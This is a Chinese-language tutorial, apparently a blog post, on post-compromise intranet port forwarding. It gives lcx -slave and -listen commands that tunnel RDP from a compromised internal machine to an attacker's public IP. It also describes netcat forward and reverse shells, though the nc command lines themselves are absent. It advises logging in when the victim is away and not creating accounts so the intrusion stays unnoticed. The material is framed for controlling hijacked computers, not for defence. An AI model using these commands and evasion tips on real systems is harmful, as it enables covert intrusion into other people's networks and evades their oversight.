内网渗透之端口转发

内网端口转发最多见的不外乎lcx与nc反弹了，很久不用快忘了，今天总结一下

 一.使用lcx进行内网端口转发

Lcx.exe是一个端口转发工具，至关于把目标服务器A上的3389端口转发到具备外网ip地址的B机上（即咱们本身的主机或是已经控制的主机），这样连接B机的3389端口就至关于连接A机的3389端口了，Lcx程序多用于被控制计算机处于内网的时候，被控制机可能中了木马程序，虽然可以进行控制，但仍是没有使用远程终端登陆到本机进行管理方便，所以在不少状况下，都会千方百计在被控制计算机上开启3389端口，而后经过lcx等进行端口转发，进而在本地链接到被控制计算机的远程终端并进行管理和使用。

1.肯定被控制计算机的IP地址

ipconfig /all查看网络配置状况，例如被控计算机的IP为192.168.80.129

二、在被控制计算机上执行端口转发命令

lcx.exe –slave 公网IP +端口 内网IP +端口

在被控制计算机上（A机）执行 lcx -slave 218.69.13.35 51 192.168.80.129 3389,执行完成后会给出一些提示。以下图：

                                             

说明：

lcx一共有三条命令，第一条命令（lcx -listen 51 3389）（3389能够设置为任意没使用的端口数字）是在具备外网独立IP的计算机上执行（即B机），表示在本机上监听51端口，该端口主要是接受被控制计算机3389端口转发过来的数据；第二条命令（lcx -slave 218.69.13.35 51 192.168.80.129 3389）表示将本机IP地址为192.168.80.129的3389端口转发到远程地址为218.69.13.35的51端口上；第三条命令式端口转向。

3.在本机上执行监听命令

在本机cmd下执行 lcx -listen 51 3389命令，监听51端口，监听成功后，会显示以下图：

注：这个时候已经将内网的3389转发到了公网机器的3389端口，咱们在本地机器上远程公网IP+3389 ，就链接上了内网机器的3389

                                             

注意：

（1）在本机上监听的端口必须是未使用的端口，可使用 netstat -an |find “51”命令来进行查看，若是没有显示结果则是表示51端口能够用来进行监听。

(2)被控制计算机与本机成功创建链接后会不停的显示链接数据，若是未出现发送数据和接受的状况，说明链接创建不成功。以下图:

                                             

4.在本机使用远程终端进行登陆

打开远程终端链接器，输入127.0.0.1进行链接后，便可远程进入被控制计算机的桌面，

                                             

注意：
（1）若是被控制的计算机是服务器，则在登陆时能够直接进行登录；若是被控制计算机是windows系统，则最好选择用户不在计算机的时间进行登录，不然容易被发现；

（2）不要轻易在被控制计算机上创建帐号，尤为是windows，创建帐号后，会当即在登录界面中进行显示。

 

二.nc反弹

最好记的就是用真实操做来作笔记了

nc反弹有正向链接与反向链接

环境：本机：192.168.43.142(win7) 远程机器：192.168.43.137(xp) 

1.nc正向链接

在远程机

---返回xp的cmdshell

在本机

成功以后，本地机器就得到了一个远程机器的shell

 

 2.nc反向链接

在本机运行上

在远程机

而后成功以后，咱们在本地机器上看一下，已经得到了远程机器的cmdshell